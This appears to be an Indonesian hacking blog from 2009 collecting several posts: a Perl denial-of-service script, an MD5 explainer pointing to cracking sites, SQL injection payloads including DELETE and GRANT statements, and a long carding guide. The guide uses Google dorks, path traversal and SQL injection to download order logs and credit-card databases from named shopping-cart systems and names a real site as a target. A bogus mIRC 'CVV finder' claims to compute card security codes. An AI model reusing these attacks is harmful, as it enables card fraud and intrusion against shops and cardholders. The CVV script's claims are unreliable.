Ddos perl

Posted in ilalang23 on Januari 8, 2009 by linkhacker

Project by ilalang23

ddos perl mungkin bisa jalan.

#!/usr/bin/perl
use IO::Socket;

print “\n  |————————————————-|”;
print “\n  |Dor…Dor…Dor…koboi main Tembak terselubung  |”;
print “\n  |————————————————-|”;
print “\n  |”;

if (@ARGV < 2)
{
print “\n[!] Penggunaan: perl tembak.pl [Host] [Port] “;
print “\n[!] Contoh: perl tembak.pl [ip] [port]”;
 exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = “A” x 800000000000000000000000000000000000000000000;

$socket = IO::Socket::INET->new( Proto => “tcp”, PeerAddr => “$ip”, PeerPort => “$port”) || die “\n[-] Koneksi: Gagal!\n”;
print “\n[+] Koneksi: Ok!\n”;
print “[+] Ngirim Pasukan Demit…\n”;

print $socket “USER $exploit\n”;
sleep(5);
close($socket);

print “[?] Modiar ora kowe!\n”;
print “[?] wait sasaran down mbut !\n”;

#ilalang23 [07.12.09]

Mengulas sedikit Tentang MD5

Posted in ilalang23 on Januari 9, 2009 by linkhacker

MD5 (Message Digest algorithm 5)ialah fungsi hash kriptografik yang digunakan secara luas dengan hash value 128-bit. Pada standart Internet (RFC 1321), MD5 telah dimanfaatkan secara bermacam-macam pada aplikasi keamanan, dan MD5 juga umum digunkan untuk melakukan pengujian integritas sebuah file. MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya yaitu MD4.

MD5 banyak digunakan oleh CMS-CMS besar seperti Joomla dan Mambo untuk melakukan enkripsi password.

Pseudocode
//Catatan: Seluruh variable tidak pada 32-bit dan dan wrap modulo 2^32 saat melakukan perhitungan

//Mendefinisikan r sebagai berikut
var int[64] r, k
r[ 0..15] := {7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22, 7, 12, 17, 22}
r[16..31] := {5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20, 5, 9, 14, 20}
r[32..47] := {4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23, 4, 11, 16, 23}
r[48..63] := {6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21, 6, 10, 15, 21}

//Menggunakan bagian fraksional biner dari integral sinus sebagai konstanta:
for i from 0 to 63
k[i] := floor(abs(sin(i + 1)) × 2^32)

//Inisialisasi variabel:
var int h0 := 0x67452301
var int h1 := 0xEFCDAB89
var int h2 := 0x98BADCFE
var int h3 := 0x10325476

//Pemrosesan awal:
append “1” bit to message
append “0” bits until message length in bits ≡ 448 (mod 512)
append bit length of message as 64-bit little-endian integer to message

//Pengolahan pesan paada kondisi gumpalan 512-bit:
for each 512-bit chunk of message
break chunk into sixteen 32-bit little-endian words w(i), 0 ≤ i ≤ 15

//Inisialisasi nilai hash pada gumpalan ini:
var int a := h0
var int b := h1
var int c := h2
var int d := h3

//Kalang utama:
for i from 0 to 63
if 0 ≤ i ≤ 15 then
f := (b and c) or ((not b) and d)
g := i
else if 16 ≤ i ≤ 31
f := (d and b) or ((not d) and c)
g := (5×i + 1) mod 16
else if 32 ≤ i ≤ 47
f := b xor c xor d
g := (3×i + 5) mod 16
else if 48 ≤ i ≤ 63
f := c xor (b or (not d))
g := (7×i) mod 16

temp := d
d := c
c := b
b := ((a + f + k(i) + w(g)) leftrotate r(i)) + b
a := temp

//Tambahkan hash dari gumpalan sebagai hasil:
h0 := h0 + a
h1 := h1 + b
h2 := h2 + c
h3 := h3 + d

var int digest := h0 append h1 append h2 append h3 //(diwujudkan dalam little-endian)

MD5 Hash
Hash-hash MD5 sepanjang 128-bit (16-byte), yang dikenal juga sebagai ringkasan pesan, secara tipikal ditampilkan dalam bilangan heksadesimal 32-digit. Berikut ini merupakan contoh pesan ASCII sepanjang 43-byte sebagai masukan dan hash MD5 terkait:

MD5(“The quick brown fox jumps over the lazy dog”) = 9e107d9d372bb6826bd81d3542a419d6

Bahkan perubahan yang kecil pada pesan akan (dengan probabilitas lebih) menghasilkan hash yang benar-benar berbeda, misalnya pada kata “dog”, huruf d diganti menjadi c:

MD5(“The quick brown fox jumps over the lazy cog”) = 1055d3e698d289f2af8663725127bd4b

anda bisa menggunakan program-program komputer yang bisa mengubah MD5 Hash menjadi plain text. Contoh program-program tersebut salahsatunya adalah Cain & Able. Selain itu ada beberapa website yang juga menyediakan fasilitas untuk melakukan cracking MD5 Hash. Website-website tersebut antara lain adalah

http://passcracking.com/

http://milw0rm.com/cracker/insert.php

Dan masih banyak lagi….

Special Thanx’s for Alloh Ta’ala atas NIkmat-NYA

I Love U istri & anakku

Obat untuk SQL Injection

Posted in ilalang23 on Januari 9, 2009 by linkhacker

Modified by ilalang23

SQL Injection adalah salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server. Pada dasarnya,serangan ini difasilitasi oleh kode program anda sendiri.
teknik nya,penyerang mencoba memasukkan query (melalui field atau URL) yang akan menyebabkan database server men-generate query SQL yang tidak valid.
Pada kenyataan nya,SQL injection terbukti merupakan salah satu teknik terbaik yang sering
melumpuhkan sasarannya. Begitu penyerang berhasil menguasai kendali dataase server,ia bisa
melakukan apa saja,seperti memodifikasi atau bahkan menghapus semua data yang ada. bagaimana pun juga ,
ini bisa dicegah jika kode program anda melakukan validasi yang baik.
Sebenarnya apa bila anda teliti,teknik SQL injection sangat sederhana sekali. Akan tetapi
justru yang sering diabaikan oleh para programer,entah itu tidak tahu atau lupa.

Berikut ini beberapa contoh teknik SQL injection,implementasi,dan cara menggagalkan nya.

Single SQL Injection
walaupun penyerang awalnya mencoba memasukan query berupa pernyataan SQL,akan tetapi bukan
sembarang query. Dalam hal ini,penyerang cukup memiliki pengatahuan mengenai SQL,sebagai
contoh permulaan (maklumlah saya masih newbie :P) anda memiliki kode seperti ini.

$match = false;
if (isset($_POST[‘submit’])) {
$nama = $_POST[‘nama’];
$pass = $_POST[‘pass’];
$sql = “SELECT nama, password FROM user WHERE
nama=’$nama’ AND password=’$pass'”;
$res = mysqli_query($db, $sql);
// jika res berhasil,dan row yang
// dikembalikan=1, set $match=true
if ($res && mysqli_query_rows($res) == 1) {
$match = true ;
mysqli_free_result($res);
}
if ($match === true) {
echo ‘account match’;
} else {
echo ‘invalid account’;
}
}

kode program diatas memang kelihatan melakukan verifikasi data, tetapi sebenarnya sangat
rapuh,penyerang bisa menggnakan query-query seperti dibawah ini,untuk melakukan akses
secara tidak sah

// mengisi field nama saja,# adalah komentar,
// yang akan mengabaikan baris setelahnya
admin’#

// mengisi nama field saja
// mengekstrak data kelokasi tertentu
‘OR’ 1=1 INTO DUMPFILE ‘/path/ke_lokasi/file.txt ‘#
‘OR’ 1=1 INTO OUTFILE ‘/path/ke_lokasi/file.txt ‘#

Bagaimapun juga,contoh contoh SQL injection diatas adalah contoh yang umum. Adapun untuk
mencegah nya menggunakan fungsi mysql_real_escape_string () atau addslashes(), seperti
yang diuraikan pada fungsi myMacig()sebelumnya

$nama = myMacig($_POST[‘nama’]};
$pass = myMacig($_POST[‘pass’]};

Multiple SQL injection
Contoh SQL injection lainnya adalah dengan memberikan multiple query,seperti berikut:
// $id dari method GET/POST
$sql = “SELECT * FROM buku WHERE kode='{$id}’ “;
//mengahapus isi table
0; DELETE FROM user
// membuat account baru
0; GRANT ALL ON *.* TO ‘xxx@%’
Dalam kasus ini,macig quote akan mengabaikan tanda titik koma,ini sangat membahayakan
jika menggunakan SQLite atau postgreSQL. Adapun solusi nya adalah menggunakan operator
casting untuk memastikan bahwa id harus integer.

//Simulasi nilai $_POST[‘id’]
0; DELETE FROM user
$id = (int) myMacig($_POST[‘id’]);

apabila anda ingin memeriksa apakah input mengandung karakter tertentu,gunakan fungsi strpos().

$nama = myMacig ($_POST [‘id’]);
// periksa apakah karakter ; terdapat
// di variabel $nama.
if (strpos($nama, ‘;’ die (‘Naughty Naughty,
Very Naughty…’);

Foto Bugil sarah azari & rahma

Posted in ilalang23 on Januari 8, 2009 by linkhacker

hahahahaa ketupu ya loe. juh

Bug Lama mencari CC

Posted in ilalang23 on Januari 8, 2009 by linkhacker

sebelumnya, maaf jika ada pertanyaan lebih lanjut dimohon cari sendiri solusinya, ini hanya sekedar informasi.

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp

Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm

Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp

Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx

Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/dbsetup.asp

Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb

Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb

Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb
sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –> cgi-bin/commercesql/index.cgi?page=

Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –> www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

Untuk melihat admin manager –> www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

Untuk melihat file log/CCnya –> www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order

7. contoh bugs pada bentuk toko sistem : EShop contoh toko akan muncul di search
engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk
membaca database access.mdb sebaiknya pake ms access aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita
sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan
cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di
site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text
editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi,
dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan
ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp Buka url target
dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh : http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,

fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20’a%25’–
Gantilah nilai dari string url terakhir dg:
%20’a%25’–
%20’b%25’–
%20’c%25’–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin

Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per
satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&amp;hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&amp;action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&amp;category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template

13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/vsproducts.mdb

Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti
:
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : ‘or”=”
Password : ‘or”=”
1. kita gunakan dari bugs webshop Sunshop
google dork : “Powered by SunShop 3.2?
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’

Mencari Cvv

Posted in ilalang23 on Januari 8, 2009 by linkhacker

Script berikut adalah untuk mencari CVV dari CC yg belum di ketahui no CVV nya. Silahkan copy dan paste di remote script editor mIrc Anda. Untuk menggunakannya, cukup klik kanan di status dalnet, chanel, atau di query trus pilih menu Cari CVV, atau tekan tombol F5. Setelah muncul kotak dialog, masukan no CC yang akan di cari CVV nya. Untuk melihat hasilnya bisa lihat di dalnet status. Selamat mencoba…

—- script mulai disini —-
alias f5 cvv2
menu status,channel,query {

Cari CVV:cvv2
}
alias cekcvv2 {
set %cv1 $left(%cc,8)
set %cv1.1 $right(%cv1,1)
set %cv2 $left(%cc,12)
set %cv2.2 $right(%cv2,1)
set %cv3 $left(%cc,3)
set %cv3.3 $right(%cv3,1)
set %cv4 $left(%cc,1)
set %cv4.4 $calc(%cv3.3 + 1)
set %cvv2 %cv1.1 $+ %cv2.2 $+ %cv4.4
set %cvv $left(%cvv2,3)
.timer 2 2 /echo _7,1 CVV dari_8 %cc _7adalah_8 %cvv _7Enjoy!!! _
.timer 1 5 /echo _15,1 —– CVV2 Finder by ilalang23 #javahack #linkhacker —–
_
}

alias cvv2 dialog -m cvv2 cvv2
dialog cvv2 {
title “CVV Finder by ilalang23”
size -1 -1 250 145
box “Enjoy..!!”,2, 4 4 242 110
text “Masukan No CC Yang akan di cari CVV-nya”,4, 1 30 249 25, center
edit “”,5, 55 57 140 20 ,autohs
button “&Find Now”,3, 80 85 100 20,defult,ok
text “Email : admin@localhost.com “,7, 1 120 249 25, center,disable
}
on 1:dialog:cvv2:*:*: {
if ($devent == sclick) {
if ($did == 3) {
.set %cc $did(5)
.timer 1 1 cekcvv2
}
}
}
—- script berakhir disini —-